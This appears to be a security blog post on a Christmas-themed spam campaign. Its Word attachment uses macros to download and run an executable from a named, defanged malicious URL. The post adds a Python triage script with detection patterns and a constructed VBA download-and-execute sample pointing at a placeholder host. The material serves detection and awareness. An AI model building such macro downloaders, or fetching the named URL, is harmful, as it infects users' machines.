Spammers are taking advantage of the Christmas season to infect computers all over the world by emailing a tempting Word document named “CHISTMAS OFFERS.docx”. With shoppers hunting for the best holiday deals on gifts, who wouldn’t be tempted to open such a file?
It might be tempting to open the file to see what these offers are all about. However, the document is blank and requires the user to enable macros in order to view it. By default, Microsoft Office disables macros, which are a handy automation feature but also a huge security risk. This is where the social engineering lies: the crooks are counting on people being so eager to see the promised content that they will push the button and get infected.
The spammers who emailed the infected files created several macros, but you cannot see them in the document because they are password protected. However, you can use the OfficeMalScanner tool to extract the macro code and open it in any text editor. The macros are written in Visual Basic for Applications (VBA), which has the ability to download just about any file from any external URL.
By enabling content or macros, you allow the code to start downloading just about anything it was written to download. Once enabled, these macros download a file from the URL hxxp://jasoncurtis.co.uk/js/bin.exe and then run it from your temp folder.
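Once the macro source has been extracted to plain text, a quick triage pass can flag the combination described above: code that runs when content is enabled, fetches a file from a URL, and executes it from the temp folder. The script below is an added example, not code from the original article or from OfficeMalScanner; the indicator list is an assumed, non-exhaustive set of common VBA keywords, and both sample macros and the placeholder URL are constructed for illustration.

```python
import re

# Assumed, non-exhaustive indicator groups for extracted VBA source.
INDICATORS = {
    "auto_exec": r'\b(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b',
    "download": r'\b(URLDownloadToFile\w*|MSXML2\.\w*XMLHTTP|WinHttpRequest)\b',
    "execute": r'\b(Shell|ShellExecute\w*|WScript\.Shell)\b',
    "temp_path": r'Environ\$?\(\s*"(TEMP|TMP)"\s*\)|GetTempPath',
    # Accepts both live (http) and defanged (hxxp) URLs.
    "url": r'\bh(?:tt|xx)ps?://[^\s"]+',
    "executable_name": r'[\w\-]+\.(?:exe|scr|dll)\b',
}

def triage(vba_source):
    """Return {category: sorted unique matches} for one extracted macro module."""
    hits = {}
    for name, pattern in INDICATORS.items():
        found = {m.group(0) for m in re.finditer(pattern, vba_source, re.IGNORECASE)}
        if found:
            hits[name] = sorted(found)
    return hits

def is_downloader(hits):
    """True when auto-run, download and execute indicators all appear together."""
    return all(k in hits for k in ("auto_exec", "download", "execute"))

# Constructed sample: defanged placeholder URL, no API declaration, not runnable VBA.
SAMPLE = '''
Sub Document_Open()
    dest = Environ("TEMP") & "\\placeholder.exe"
    URLDownloadToFile 0, "hxxp://example.invalid/placeholder.exe", dest, 0, 0
    Shell dest
End Sub
'''

# Constructed benign macro for comparison.
BENIGN = '''
Sub FormatReport()
    Selection.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for label, source in (("sample", SAMPLE), ("benign", BENIGN)):
        hits = triage(source)
        print(label, "downloader" if is_downloader(hits) else "no downloader pattern")
        for category, values in hits.items():
            print("   ", category, values)
```

Keyword matching like this is a first-pass filter only: obfuscated macros that build these strings at run time will not match, so a clean result does not mean the document is safe.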